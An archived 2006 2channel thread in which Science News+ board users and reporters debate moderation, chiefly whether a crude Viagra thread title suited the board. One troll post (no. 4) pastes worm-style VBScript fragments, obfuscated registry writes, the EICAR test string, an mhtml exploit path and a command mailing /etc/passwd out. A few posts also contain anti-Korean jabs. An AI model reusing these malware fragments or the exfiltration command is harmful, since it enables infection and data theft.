5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

自治議論@科学+★5

1 :分子ビーム!(ノ≧∀≦)ノ・‥…━━φ ★:2006/12/21(木) 19:52:41 ID:???
科学+板 自治スレです。

前スレ:
自治議論@科学+ ★4
http://news18.2ch.net/test/read.cgi/scienceplus/1134772104/

雑談や雑多な質問はこちらへ。
雑談・質問★3
http://news18.2ch.net/test/read.cgi/scienceplus/1163195322/

スレ立て依頼もどうぞ活用してやって下さい。
◆スレッド作成依頼スレッド★4◆
http://news18.2ch.net/test/read.cgi/scienceplus/1142089748/

2 :名無しのひみつ:2006/12/21(木) 19:53:20 ID:lgYjTDo0
   ,;f::::::::::::::::::::::T
   i:::/'" ̄ ̄ヾ:::i
   |/ ,,,,_  ,,,,,,_ヾ|
   |=(,' 3)=(,' 3)=|  おっ!良スレが立ったなぁ〜
   {  :::(__..::  |
   ',  ー=ー  ',
 i"./ ヽ___ / ',ヽ
 ヽi          iノ
  ',    ∩    /
   ヽ  (.  )  /
    ',   i!  /
   (___/ \___)


3 :分子ビーム!(ノ≧∀≦)ノ・‥…━━φ ★:2006/12/21(木) 19:53:25 ID:???
過去の自治スレ

自治議論@科学+★3
http://news18.2ch.net/test/read.cgi/scienceplus/1120970942/
自治議論@科学+★2
http://news18.2ch.net/test/read.cgi/scienceplus/1091420284/
前スレ:自治議論★1
http://news16.2ch.net/test/read.cgi/scienceplus/1085829587/


記者活動に興味がある方はここもチェック
◆科学ニュース+記者募集のお知らせ Part2
http://news18.2ch.net/test/read.cgi/scienceplus/1157659988/

4 :名無しのひみつ:2006/12/21(木) 20:07:47 ID:sV7my6Ey
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirwin&"\Win32DLL.vbs")
ms-its:mhtml:file://c:\
End Sub

5 :名無しのひみつ:2006/12/21(木) 20:21:17 ID:qcWF07Mh
朝鮮朝鮮
をどうにかしろ

6 :名無しのひみつ:2006/12/21(木) 20:52:51 ID:3SVs3edB
論文でスレを立ててもらう場合だね、翻訳しなくてもいいのかね?

7 :公共交通ヲタですが:2006/12/22(金) 06:17:33 ID:2J2AVMjf
まいど、この板にはお世話になっています。
ところで、ちょっと質問。
この板の入口の画像が宇宙ネタしかないのはなぜ?
あと、>>4をどうにかしてね。

8 :名無しのひみつ:2006/12/22(金) 06:49:54 ID:1rzLxUJQ
自分でどうにかしろ

9 :川: ;@u@)y~~~<パパデスφ ★:2006/12/22(金) 10:11:26 ID:???
いどん一点乙

10 :名無しのひみつ:2006/12/22(金) 10:40:52 ID:BlDzR0wk
>>4
は、国に帰れと3回毎日書きこめば大丈夫。

11 :名無しのひみつ:2006/12/22(金) 16:06:47 ID:Gcggy8f+
れぞんでーとるおつ

12 : ◆GEDO/87xso @外道φ ★:2006/12/22(金) 18:31:12 ID:??? ?2BP(2505)
>>6
日本語でない場合、それなりに1に和訳をつけることが必要ですー。

13 : ◆GEDO/87xso @外道φ ★:2006/12/22(金) 18:32:46 ID:??? ?2BP(2505)
>>7
> この板の入口の画像が宇宙ネタしかないのはなぜ?

看板職人さんの作ってくださったものが、そっち方面のものが多いからかもしれません。

14 : ◆KzI.AmWAVE :2006/12/22(金) 21:11:30 ID:o3v5lY/r ?2BP(125)
宇宙関係はイベントが多いからでしょうか。
どなたか作ってみませんか。

科学ニュース+板 看板アップロードスレッド
http://www.news2ch.net/bbs/test/read.cgi/dqnplus/1103726749/
現在の看板リスト
http://newsplus.jp/~nanpanokisya/scienceplus/list.html

15 :外道 ◆GEDO/87xso :2006/12/23(土) 07:37:34 ID:vTa8hHQY ?2BP(2505)
科学ニュース+過去ログ倉庫( http://gedo.newsplus.jp/bbs/scienceplus/ )を更新しました。

補完した前スレ。

自治議論@科学+ ★4
http://gedo.newsplus.jp/bbs/test/read.cgi/scienceplus/1134772104/
http://newsplus.jp/~gedo/bbs/test/read.cgi/scienceplus/1134772104/

16 :名無しのひみつ:2006/12/23(土) 07:39:32 ID:vcCuVbLX


17 :名無しのひみつ:2006/12/23(土) 10:54:22 ID:tFN4CbbK
非道さん乙。

18 :名無しのひみつ:2006/12/24(日) 00:32:27 ID:JaVzrVE4
変なタイトルそのままでスレ立てるのは
下らん脇道に逸らしたいからだよね
東亜でやれ

【光学】 韓国の研究チームが「ベクトル場顕微鏡」を世界最初開発
http://news18.2ch.net/test/read.cgi/scienceplus/1166884982/

19 :名無しのひみつ:2006/12/24(日) 14:35:06 ID:r46w7VtT
やっぱりダメかなと言っときつつ、まだアナルを完全には見放してない外道さんはかなりのツンデレ

20 :名無しのひみつ:2006/12/24(日) 16:11:43 ID:SM3junVf
なんでこんなスレタイにするのか、理解に苦しむ

http://news18.2ch.net/test/read.cgi/scienceplus/1166942194/
1 名前:冷やし中華 部分的に終わりました(060918)φ ★[sage] 投稿日:2006/12/24(日) 15:36:34 ID:???

21 :名無しのひみつ:2006/12/24(日) 16:33:31 ID:dXi/tYJs
>>20
お下劣ですよね。

22 :番組の途中ですがおいすー( ^ω^)ノです:2006/12/24(日) 21:05:44 ID:0Aaffs9b ?PLT(10061)
科学+でエロ・下品と判断する基準みたいなのはあるの?

23 :名無しのひみつ:2006/12/24(日) 21:15:16 ID:+F/YY4un
科学ニュース+過去ログ倉庫
http://newsplus.jp/~gedo/bbs/scienceplus/


自治議論@科学+★3
http://newsplus.jp/~gedo/bbs/test/read.cgi/scienceplus/1120970942/21-26

荒っぽく検索かけましたが、これくらいですかね。

24 :名無しのひみつ:2006/12/24(日) 21:23:36 ID:CnSNh0mS
>>18
そういうの前から気になってたw
でもソース読めば同じような展開になりそうなんだけどな。

でも一辺倒の嫌韓が議論の妨げになってるのは確か。
住人は少し自重して欲しいな。

25 : ◆KzI.AmWAVE @Hφ=Eφ ★:2006/12/24(日) 22:12:38 ID:??? ?2BP(125)
>>20
これはアウツやね

26 : ◆KzI.AmWAVE :2006/12/24(日) 22:27:16 ID:BR5bN4Zv ?2BP(125)
参考リンク
http://news19.2ch.net/test/read.cgi/news/1138964652/1+78
http://news19.2ch.net/test/read.cgi/newsplus/1156756651/949-954
http://news18.2ch.net/test/read.cgi/news4plus/1166455135/262

27 :冷やし中華 部分的に終わりました(060918)φ ★:2006/12/24(日) 22:42:00 ID:???
マンコはだめだけどチンコはおkだろ
常識的に考えて(´・ω・`)

28 :芋の煮っ転がされφ ★:2006/12/24(日) 22:50:57 ID:??? ?2BP(2215)
>>27


29 :冷やし中華 部分的に終わりました(060918)φ ★:2006/12/24(日) 22:57:26 ID:???
いや…だってさ、TVだと子供のマンコはNGだけど
チンコはOKじゃん。それと同じ理屈なんだけど、だめ…かな

30 :芋の煮っ転がされφ ★:2006/12/24(日) 22:59:09 ID:??? ?2BP(2215)
カキコ途中で送信しました。
済みませんorz

>>27
確かに食い付きは良いかも知れないですね。
でも、もう少し工夫があったほうが良いのでないかと思ったです。

出来ればそういうワイワイは二軍修行時にやって頂きたかった。
残念至極。

31 :冷やし中華 部分的に終わりました(060918)φ ★:2006/12/24(日) 23:13:21 ID:???
むぅ…エロイスレタイはだめだとは知ってましたが注意
される程とは思わなかったです。
エロや下品の感覚がネットに毒されてくるとどうも…
ちょっとスレタイのつけ方考えてみます。
科学板は好きなんで。首になるの嫌だし

32 :名無しのひみつ:2006/12/24(日) 23:13:51 ID:0Aaffs9b
科学+は真面目な板ってのがいいところだと思うんだよね
そういう板の雰囲気を壊すようなスレタイでスレを立てるのは正直止めて欲しい

33 :名無しのひみつ:2006/12/24(日) 23:14:48 ID:UDQjeVcz
板の雰囲気だね

空気を読む力

立っているスレを見ればと言う言葉もある

34 :冷やし中華 部分的に終わりました(060918)φ ★:2006/12/24(日) 23:36:36 ID:???
空気ね。空気読みつつ目を引くスレタイもつけたいのが記者心じゃん。
というか住民は真面目なスレタイを望んでるのかね。
科学板だからとかいうけど、そう思ってるのって記者と自治厨だけじゃねえの?
俺的には少々砕けたスレタイの方が開いてみようって気になるけどね。
それはニュースにもよるんだろうけど、このニュースにはこのスレタイでおkだと思った。
という経緯でありあす。


35 :名無しのひみつ:2006/12/24(日) 23:39:07 ID:UDQjeVcz
キショ

36 :名無しのひみつ:2006/12/24(日) 23:39:24 ID:+zYmo9vT
うわー、てことは俺も自治厨かぁ

37 : ◆NAO/2MXDEk @NAOφ ★:2006/12/24(日) 23:39:49 ID:???
>>冷やし中華さん
こうすればまだよかったと思います。

 立たないペニスを力強く勃起させるバイアグラに秘められた驚くべき重大な「副作用」とは?

萎えたちんことか、ビンビンとか、そういう表現がまずかったものと思います。
しかし、萎えたちんこビンビンという表現は、他の板なら辛うじてセーフだったかもしれませんね。
ただ、科学+に向かなかったというだけですので、落ち込まないでください。

38 :名無しのひみつ:2006/12/24(日) 23:43:06 ID:MFqmS28/
ええとね、うまく伝えられるかちょっと自信ないけど、
科学的に目を引くスレタイをつくる工夫なら大歓迎だと思うのね。
遊び心はあったほうがいいと個人的には思う。
ただ、それがどこに向けられてるかってことじゃないかな。

39 :名無しのひみつ:2006/12/24(日) 23:43:32 ID:jk5E9TU/
ペニスが大きくなる

これでいいのに

40 :名無しのひみつ:2006/12/24(日) 23:46:06 ID:3IxK2b5l
海綿体を膨張させる

こっちの方が俺の好み

41 :名無しのひみつ:2006/12/24(日) 23:48:40 ID:jk5E9TU/
もっと穏やかに

男性器を活性化する

42 :名無しのひみつ:2006/12/24(日) 23:53:23 ID:fFhqbH9u
ニュース内容のインパクトで皆の注目を集めるのが科学+の趣旨なんじゃないかと理解してるんだが

そもそもエロ・下品なスレタイは科学+にいらないと思う

43 :冷やし中華 部分的に終わりました(060918)φ ★:2006/12/25(月) 00:00:40 ID:???
>>37>>40>>41
そういう表現の方が(;´Д`)ハアハアする俺はやばいのか
とりあえず、「バイアグラ」で意味は通るから、エロ表現がNGなら

【研究】バイアグラに秘められた驚くべき重大な「副作用」とは?[12/24]

でよかったような気がします。
Hφ=Eφ ★さん 芋の煮っ転がされφ ★さん NAOφ ★ さん 他
色々アドバイスありがとうございます。



44 :カスパー▲:2006/12/25(月) 01:29:05 ID:Ip+ONSIU

教育用語は「おちんちん」です。
みなさん、文科省推奨表現を心がけましょうです

45 :名無しのひみつ:2006/12/25(月) 04:03:32 ID:0IuWRzVd
>>43
【研究】←これ変な気がします。

46 :名無しのひみつ:2006/12/25(月) 21:45:05 ID:yp3ElzGG
【技術】荏原、泡盛メーカーのバイオマス施設を受注
http://news18.2ch.net/test/read.cgi/scienceplus/1167046562/

この内容だと、bizではなかろうか。

47 :名無しのひみつ:2006/12/25(月) 21:52:36 ID:+ttvkC83 ?PLT(10061)
biz+で立てたほうが適切だと思います

48 :名無しのひみつ:2006/12/25(月) 22:11:01 ID:5HdOXz9c
明らかに受注がメインだもな・・・

49 :カスパーφφ ★:2006/12/26(火) 10:33:15 ID:??? ?2BP(2505)
>>43
どうぞスレタイへの気配りとかとかよろしくですー。

50 :カスパーφφ ★:2006/12/26(火) 10:36:30 ID:??? ?2BP(2505)
>>46
技術というより商行為かな。
この板らしい新しい知見とか事実が配信記事に欲しいところ。

そのあたり、もうちょっと考えてみてくださいね>ばーきゅーφ ★さん

51 :名無しのひみつ:2006/12/26(火) 15:19:41 ID:q+PFjdvk
>>49
参考までに教えていただきたい。
この板の許容範囲は、どの程度なんでしょう
結局、チンコ、チムコ、おちんちん辺りは許される表現なんでしょうか?

また、品位を落とさないよう直接的な表現を避けて
たとえば「暴れん坊将軍」などと表現することは適当でしょうか?

52 :名無しのひみつ:2006/12/26(火) 16:48:13 ID:xgY7vmD6
>>51
暴れん坊将軍って時点でただのネタになってないか?
そういうのがやりたいなら痛い+とかいけば?

53 :名無しのひみつ:2006/12/26(火) 18:07:19 ID:Aq8fyjQI
>>51
なんで言質とりたいの?

54 :名無しのひみつ:2006/12/26(火) 18:41:23 ID:psNNotSI
>>52
痛+でも直接的な表現を使ったやつが剥奪されてたよ。

55 :名無しのひみつ:2006/12/26(火) 19:43:35 ID:U+IR2X63
一読者の感想としては、医学や生物学に関連する事なら
ペニス・ヴァギナまたは陰茎・陰核などの医学用語、
そこまで詳しくする必要ない分野なら性器(男性器・女性器)でいいと思う。
省略できるのなら、当然入れる必要はないですね。

人目引くタイトルは楽しいだろうけど、のちの記事の利用しやすさが下がると思う。
例えばログから文化人類学における男性器に関する記事探してて、
男性器、ペニス、ちんこ、ちんちん、陰茎、海綿体、暴れん坊将軍とかで
検索しないといけないんじゃ、めんどくさいよね。

56 :名無しのひみつ:2006/12/27(水) 10:24:17 ID:kyDGj8ji
>>53
そりゃ、言質とっとけば、
剥奪されたときに簡単に復活させてもらえるからだろ
「科学+では、こういう決まりになってますから」
とカスパーのレス見せれば即復活。

そんなに難しいこと?


57 :名無しのひみつ:2006/12/29(金) 01:48:27 ID:PSe3RXYR
時間は未定ですがサーバー移転の予定です。

http://qb5.2ch.net/test/read.cgi/operate/1119623185/503-504
http://qb5.2ch.net/test/read.cgi/operate/1119623185/549

58 :名無しのひみつ:2006/12/29(金) 03:27:04 ID:ByZUzIhw
■ お知らせ

まもなくサーバ移転が始まります。

news18→news21

作業中はスレッドに書き込めなくなったり、ほとんどのスレが一時的に見えなくなったりします。
作業終了までしばらくお待ちください。

移転作業終了後も専用ブラウザからアクセスできない時は、
板メニューhttp://menu.2ch.net/bbsmenu.html
の更新を待つか、他の更新に対応済みの板一覧をご利用ください。
詳しくは各専用ブラウザのスレか初心者の質問板で!

16 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)